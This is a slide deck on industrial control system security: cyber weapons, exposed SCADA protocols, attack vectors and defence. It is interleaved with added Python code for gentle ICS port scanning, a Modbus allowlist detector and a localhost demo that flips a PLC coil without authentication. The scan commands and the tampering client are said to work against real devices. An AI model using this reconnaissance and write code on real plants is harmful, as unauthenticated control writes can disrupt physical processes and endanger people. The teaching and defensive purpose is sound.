Industrial Control Systems (ICS) and Cyber Security
Page 1
ICS and Cyber Security
Özkan Erdoğan
Page 2
About me
12 years of experience in Cyber Security
Cyber Security Consultant
DDoS and penetration tests
… Now working on ICS Security
@ozkan_erdogan
Page 3
Agenda
What are cyber weapons
What is critical infrastructure
ICS
Cyber weapons on ICS
Protocols
Threats
Attacks and Types of Attacks
Defense principles
Page 4
Cyber Weapon
Computer code
Aims to threaten or damage
Unlike other code, it may have physical and psychological effects
Low cost, high damage
Targets: systems, people, countries, critical infrastructure
Page 5
Critical Infrastructure
Energy
Water treatment
Hospitals
Nuclear reactors
Communication lines
Defense systems
All of these systems are run by ICS.
Page 6
Utilities
Market: $1 trillion
7,391 cyber attacks (a successful attack costs on average $1.2 million)
Oil and gas
Market: $2.4 trillion
5,493 cyber attacks (a successful attack costs on average $4 million)
Page 7
Why we use ICS
A brief description:
Converting signals between digital and analog and controlling equipment so that it operates automatically according to the logic we program. Controlled equipment: robots, valves, motors, generators, air conditioning.
Examples: moving a robot arm, switching a water pump or valve on/off, mixing chemicals, flow control, raising/lowering temperature, measuring voltage, pumping oil and gas.
Page 8
SCADA in the Enterprise Network
Page 9
ICS, SCADA and PLC Definition
Industrial Control System
Page 10
HMI
Page 11
PLC
Page 12
SCADA Security (?)
CIA vs. AIC: IT ranks confidentiality first, ICS ranks availability first (then integrity, then confidentiality)
No encryption
No authentication
No authorization
Mostly default passwords
Security through obscurity
The so-called 'air gap'
The 'no touch' rule: a running system is not modified
Page 13
Cyber weapons that targeted ICS
Most destructive: Stuxnet
A worm that manipulated the Siemens PLCs controlling Iran's uranium-enrichment centrifuges.
50 malware families targeting only energy companies (FireEye).
Havex/Dragonfly: scanned TCP ports 44818 (Omron, Rockwell Automation), 102 (Siemens) and 502 (Schneider Electric)
Flame: cyber espionage (20 times bigger than Stuxnet)
BlackEnergy: variants targeting critical infrastructure
Page 14
Threat potential
Obama: A nuclear weapon's result is either 0 or 1. However, a cyber weapon lies on a spectrum from 0 to 1 and you never know what it is going to cause.
John Kerry: The 21st-century version of nuclear attacks.
Fenghui: The Internet, if not controlled, could cause more harm than nuclear weapons do.
Page 16
SCADA architecture
Technical realities:
Many different vendors, protocols and processes.
The 'air gap' has to be crossed (in practice it is rarely a true gap).
Convergence of OT with IT; protocols now run over TCP/IP.
Patching and upgrading are almost impossible (lock-in, restart issues).
Page 17
An advertisement (building automation system, translated from Turkish):
The architecture of the xxxx Building Automation System consists of programmable control units, I/O units with different point types and capacities, and HMI (touch screen) units. The most important feature of xxxxx is that the control units can go onto Ethernet directly with the TCP/IP protocol and, with their FTP and web server features, can provide access to the system over the INTERNET. In this way users can monitor system values and change setpoints remotely with a web browser, without needing any special software.
Using the xxxx Manager software, it is possible to connect to the control units locally or remotely, even over an Internet connection, and program them.
Page 18
SCADA Manufacturers
Siemens
Honeywell
Tecnomatix (USDATA)
ABB
Tibbo Systems (AggreGate SCADA/HMI)
Schneider Electric (Wonderware, Telvent, Citect)
Survalent Technology Company (STC)
Rockwell
Page 19
SCADA/ICS protocols
Modbus (bidirectional read/write; Modbus/TCP runs directly over TCP port 502 with no security layer)
PROFINET
DNP3 (bidirectional read/write; usually carried over TCP/IP, with no security layer in the base protocol)
Siemens S7 (TCP port 102)
IEC 60870-5-104 (TCP port 2404)
Page 20
ICS Attack Vectors
Information gathering
Scanning (nmap, plcscan)
ARP poisoning
Traffic capture/replay
Exploitation (Nessus plugins and Metasploit modules)
Brute force
Page 21
Information Gathering
Shodan, Censys
Nmap
PLCScan
Masscan
Google hacking
Page 22
Cont'd
Nmap, plcscan
Rule 1: Be gentle
nmap --scan-delay 1s (-n skips DNS resolution; Digital Bond publishes ICS-specific nmap scripts)
Do a TCP connect scan (-sT) instead of a SYN scan (-sS); don't use half-open scans
Do not use OS/version fingerprinting
Do not use -sC (default scripts)
Do not use UDP scans
snmpcheck -t IP
Gives you:
Open UDP and TCP ports
Service details
python plcscan.py IP (scans ports 102 and 502)
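The 'be gentle' rules above, applied in code. This is an added example, not the slides' or plcscan's code: a full-connect scan with a fixed delay between ports, no fingerprinting, and for Modbus one well-formed Read Device Identification request (function code 43, MEI type 14) in place of a banner grab. The port table, the host placeholder and the sample PLC response are constructed for illustration.

```python
"""Gentle ICS reconnaissance, as an added example (not the slides' code).

Applies the slide's 'be gentle' rules: a full TCP connect per port (no
half-open SYN scan), a fixed delay between probes, no OS or service
fingerprinting, and, for port 502, one well-formed Modbus 'Read Device
Identification' request (FC 43 / MEI type 14) instead of a banner grab.
The port table and the sample response are constructed for illustration."""
import socket
import struct
import time

# Common ICS listener ports (assumed mapping for the demo)
ICS_PORTS = {
    102: "Siemens S7 (ISO-TSAP)",
    502: "Modbus/TCP",
    2404: "IEC 60870-5-104",
    20000: "DNP3",
    44818: "EtherNet/IP (Rockwell, Omron)",
}

def device_id_request(tid=1, unit=0xFF):
    """MBAP header + PDU for Read Device Identification, basic objects, start at 0."""
    pdu = bytes([0x2B, 0x0E, 0x01, 0x00])   # FC 43, MEI 14, ReadDevId code 1, object 0
    # MBAP: transaction id, protocol id 0, length = unit id byte + PDU, unit id
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu

def parse_device_id(frame):
    """Return {VendorName, ProductCode, MajorMinorRevision} from a response frame."""
    _tid, proto, length, _unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0:
        raise ValueError("not Modbus/TCP")
    pdu = frame[7:7 + length - 1]
    if pdu[0] & 0x80:                         # exception response: FC | 0x80, code
        raise ValueError("Modbus exception code %d" % pdu[1])
    if pdu[:2] != b"\x2B\x0E":
        raise ValueError("not a device identification response")
    # pdu[2] ReadDevId code, pdu[3] conformity level, pdu[4] more follows,
    # pdu[5] next object id, pdu[6] number of objects, then (id, len, value)*
    names = {0: "VendorName", 1: "ProductCode", 2: "MajorMinorRevision"}
    objects, pos = {}, 7
    for _ in range(pdu[6]):
        obj_id, obj_len = pdu[pos], pdu[pos + 1]
        value = pdu[pos + 2:pos + 2 + obj_len].decode("ascii", "replace")
        objects[names.get(obj_id, "Object%d" % obj_id)] = value
        pos += 2 + obj_len
    return objects

def gentle_scan(host, ports=ICS_PORTS, delay=1.0, timeout=3.0):
    """Connect scan, one port at a time, sleeping `delay` seconds between ports."""
    found = {}
    for port in sorted(ports):
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        try:
            sock.connect((host, port))        # full handshake, then a clean close
            found[port] = ports[port]
        except OSError:
            pass
        finally:
            sock.close()
        time.sleep(delay)
    return found

def identify_modbus(host, port=502, timeout=3.0):
    """One request, one response; no fuzzing, no retries."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(device_id_request())
        return parse_device_id(sock.recv(260))   # max Modbus/TCP ADU is 260 bytes

def sample_response():
    """Constructed response such as a PLC might return (not a real capture)."""
    objs = b"".join(bytes([i, len(v)]) + v
                    for i, v in enumerate([b"Acme", b"PLC-01", b"v1.2"]))
    pdu = bytes([0x2B, 0x0E, 0x01, 0x01, 0x00, 0x00, 0x03]) + objs
    return struct.pack(">HHHB", 1, 0, len(pdu) + 1, 0xFF) + pdu

if __name__ == "__main__":
    print(parse_device_id(sample_response()))
    # Against a live target (assumed host): gentle_scan("192.0.2.10"); identify_modbus("192.0.2.10")
```

Unit id 0xFF is the conventional value for a Modbus/TCP device that is not a serial gateway; a gateway will want the real slave address. A PLC that does not implement function 43 answers with an exception (FC 0xAB, code 1), which the parser reports rather than retrying, since retries and malformed requests are exactly what fragile field devices do not tolerate.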
Page 23
ICS on the Internet
Page 24
Shodan findings
Siemens S7: 100 hosts on port 102
DNP3: 20 hosts on port 20000
Modbus: 338 hosts on port 502
IEC 60870-5-104: 38 hosts on port 2404
Page 25
Google dork
Page 26
Physical Attacks
Physical attacks against:
PLC
RTU
Smart meter
Relays
Circuit breakers
Page 27
Black box attacks
Web and FTP servers, field devices
Web-based attacks
SQL injection
Privilege escalation
Trojans, backdoors
DDoS
Page 28
Internal attacks
Traffic capture and replay
Man-in-the-middle
ARP poisoning
Nessus (SCADA policy and credentialed checks)
Metasploit
Wireshark
Python
Page 29
Defense
Patch management
DPI?
Data diodes?
Network segmentation and isolation
Awareness
Incident Response
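What the "DPI?" and segmentation items amount to in practice is a protocol-aware allowlist: only the engineering workstation may write, the HMI only reads, and nobody else speaks Modbus to the PLC at all. The following is an added example, not from the slides or any product: it parses MBAP-framed Modbus/TCP requests taken from captured TCP payloads and raises an alert on any function code a source is not permitted to use. The addresses, the policy and the sample frames are constructed, not a real capture.

```python
"""Modbus-aware allowlisting (deep packet inspection), as an added example
(not the slides' code).  Parses MBAP-framed Modbus/TCP requests from captured
TCP payloads and alerts when a host issues a function code its role does not
permit, or when a host outside the allowlist talks Modbus at all.  The IPs,
policy and frames below are constructed for illustration."""
import struct

WRITE_FCS = {5, 6, 15, 16, 22, 23}   # coil/register writes, mask write, read/write multiple
DIAG_FCS = {8, 17, 43}               # diagnostics, report server id, device identification
READ_FCS = {1, 2, 3, 4}              # coils, discrete inputs, holding/input registers

# Constructed policy for the PLC at 10.0.0.50: who may do what
POLICY = {
    "10.0.0.10": {"role": "engineering", "allow": WRITE_FCS | DIAG_FCS | READ_FCS},
    "10.0.0.20": {"role": "hmi", "allow": READ_FCS},      # read-only by design
}

def parse_request(payload):
    """Return (unit id, function code, data) from one Modbus/TCP request, or None if malformed."""
    if len(payload) < 8:
        return None
    _tid, proto, length, unit = struct.unpack(">HHHB", payload[:7])
    if proto != 0 or length != len(payload) - 6:   # length covers unit id + PDU
        return None
    return unit, payload[7], payload[8:]

def inspect(flows, policy=POLICY):
    """flows: iterable of (src_ip, dst_ip, tcp_payload) for traffic to port 502.
    Returns a list of (src_ip, function code or None, reason) alerts."""
    alerts = []
    for src, dst, payload in flows:
        parsed = parse_request(payload)
        if parsed is None:
            alerts.append((src, None, "malformed Modbus/TCP frame"))
            continue
        _unit, fc, _data = parsed
        entry = policy.get(src)
        if entry is None:
            alerts.append((src, fc, "unknown host speaking Modbus to %s" % dst))
        elif fc not in entry["allow"]:
            kind = "write" if fc in WRITE_FCS else "diagnostic" if fc in DIAG_FCS else "unexpected"
            alerts.append((src, fc, "%s issued %s FC %d" % (entry["role"], kind, fc)))
    return alerts

def frame(fc, data, tid=1, unit=1):
    """Build one MBAP-framed request (used only to construct the sample traffic)."""
    pdu = bytes([fc]) + data
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu

# Constructed traffic: HMI polling, engineering write, HMI writing, a stranger, a truncated frame
SAMPLE_FLOWS = [
    ("10.0.0.20", "10.0.0.50", frame(3, struct.pack(">HH", 0, 10))),       # HMI reads 10 registers
    ("10.0.0.10", "10.0.0.50", frame(6, struct.pack(">HH", 40, 1500))),    # engineering sets a setpoint
    ("10.0.0.20", "10.0.0.50", frame(5, struct.pack(">HH", 3, 0xFF00))),   # HMI writes a coil: alert
    ("10.0.0.99", "10.0.0.50", frame(43, bytes([0x0E, 1, 0]))),            # unknown host fingerprints
    ("10.0.0.20", "10.0.0.50", b"\x00\x01\x00\x00"),                       # truncated frame
]

if __name__ == "__main__":
    for alert in inspect(SAMPLE_FLOWS):
        print(alert)
```

The check is per request, so it works on a span port or a TAP without being inline; turning the same policy into blocking rules is what an industrial firewall with Modbus inspection does. The obvious blind spot is that it trusts the source IP, which is why it belongs behind the segmentation the slide lists, not in place of it.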
Page 30
Fuzzers
Commercial:
Codenomicon
Wurldtech Achilles
peachfuzzer.com
Open source:
Aegis (https://www.automatak.com/aegis/)
Page 31
Modbus/TCP
Encryption: None
Authentication: None
Page 32
Modbus Protocol Fields
Page 33
Modbus request packet
Page 34
Modbus case study
PLC simulator (ModbusPal) and mbtget: https://youtu.be/jxJ6921qrpE
Exploit via Metasploit: https://youtu.be/1bCrCFqgP-M
Tampering via mbtget: https://youtu.be/mGixseMvaMM
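The protocol fields, request packet and tampering demo of the last four slides, carried through in code. This is an added example, not the slides' code and not ModbusPal or mbtget: a minimal Modbus/TCP simulator (only function code 1, Read Coils, and function code 5, Write Single Coil) listens on localhost, and a client flips a coil and reads it back. The MBAP header (transaction id, protocol id, length, unit id) and the PDU (function code plus data) are built and parsed by hand so every byte on the wire is visible. The coil table, addresses and exception handling are constructed for the demo.

```python
"""Modbus/TCP tampering end to end, as an added example (not the slides' or
mbtget's code).  A minimal Modbus/TCP simulator (only FC 1 Read Coils and
FC 5 Write Single Coil) listens on localhost; a client flips a coil and reads
it back.  No step is authenticated or encrypted: whoever can reach port 502
owns the coil.  The coil table and addresses are constructed for the demo."""
import socket
import struct
import threading

READ_COILS, WRITE_SINGLE_COIL = 0x01, 0x05
EXC_ILLEGAL_FUNCTION, EXC_ILLEGAL_ADDRESS, EXC_ILLEGAL_VALUE = 0x01, 0x02, 0x03

def mbap(pdu, tid=1, unit=1):
    """MBAP header: transaction id, protocol id 0, length = unit id + PDU, unit id."""
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu

def read_coils_pdu(addr, count):
    return struct.pack(">BHH", READ_COILS, addr, count)

def write_coil_pdu(addr, on):
    return struct.pack(">BHH", WRITE_SINGLE_COIL, addr, 0xFF00 if on else 0x0000)  # ON = 0xFF00

def handle_pdu(coils, pdu):
    """Server side: apply one request PDU to the coil table, return the response PDU.
    The protocol carries no identity, so nothing here checks who is asking."""
    fc = pdu[0]
    if fc == WRITE_SINGLE_COIL:
        addr, value = struct.unpack(">HH", pdu[1:5])
        if value not in (0x0000, 0xFF00):
            return bytes([fc | 0x80, EXC_ILLEGAL_VALUE])
        if addr >= len(coils):
            return bytes([fc | 0x80, EXC_ILLEGAL_ADDRESS])
        coils[addr] = value == 0xFF00
        return pdu                               # success echoes the request
    if fc == READ_COILS:
        addr, count = struct.unpack(">HH", pdu[1:5])
        if not 1 <= count <= 2000 or addr + count > len(coils):
            return bytes([fc | 0x80, EXC_ILLEGAL_ADDRESS])
        packed = bytearray((count + 7) // 8)
        for i in range(count):                   # coil status bits are packed LSB first
            if coils[addr + i]:
                packed[i // 8] |= 1 << (i % 8)
        return bytes([fc, len(packed)]) + bytes(packed)
    return bytes([fc | 0x80, EXC_ILLEGAL_FUNCTION])

def parse_coils(pdu, count):
    """Client side: unpack a Read Coils response into a list of bools."""
    if pdu[0] & 0x80:
        raise RuntimeError("Modbus exception %d" % pdu[1])
    return [bool(pdu[2 + i // 8] >> (i % 8) & 1) for i in range(count)]

def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed")
        buf += chunk
    return buf

def serve_one(coils, port_box, ready):
    """Accept one client on an ephemeral localhost port and answer until it hangs up."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port_box.append(srv.getsockname()[1])
    ready.set()
    conn, _ = srv.accept()
    with srv, conn:
        try:
            while True:
                tid, _, length, unit = struct.unpack(">HHHB", recv_exact(conn, 7))
                pdu = recv_exact(conn, length - 1)
                conn.sendall(mbap(handle_pdu(coils, pdu), tid, unit))
        except ConnectionError:
            pass

def transact(sock, pdu, tid):
    """Client side: send one request, return the response PDU."""
    sock.sendall(mbap(pdu, tid))
    _, _, length, _ = struct.unpack(">HHHB", recv_exact(sock, 7))
    return recv_exact(sock, length - 1)

def demo(coil=3):
    """Start the simulator, flip one coil from an unauthenticated client, read back."""
    coils, port_box, ready = [False] * 8, [], threading.Event()
    server = threading.Thread(target=serve_one, args=(coils, port_box, ready), daemon=True)
    server.start()
    ready.wait(5)
    with socket.create_connection(("127.0.0.1", port_box[0]), timeout=5) as sock:
        before = parse_coils(transact(sock, read_coils_pdu(0, 8), 1), 8)
        transact(sock, write_coil_pdu(coil, True), 2)   # the "tamper": no credentials needed
        after = parse_coils(transact(sock, read_coils_pdu(0, 8), 3), 8)
    server.join(5)
    return before, after

if __name__ == "__main__":
    print(demo())
```

Run it and the two lists printed are the coil table before and after the write; a Wireshark capture on loopback shows exactly the twelve bytes of the write request, with nothing an attacker would have to know beyond the address. The same client works unchanged against ModbusPal or a real PLC on port 502, which is the whole lesson of the slide.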
Page 35
Vulnerabilities
...and counting!!
Page 36
Case Study: Ukraine power outage
Page 37
Exploitation Tools
...or buy them: Agora SCADA+ ('Made in Russia')
Page 38
The End
Thank you...
Questions?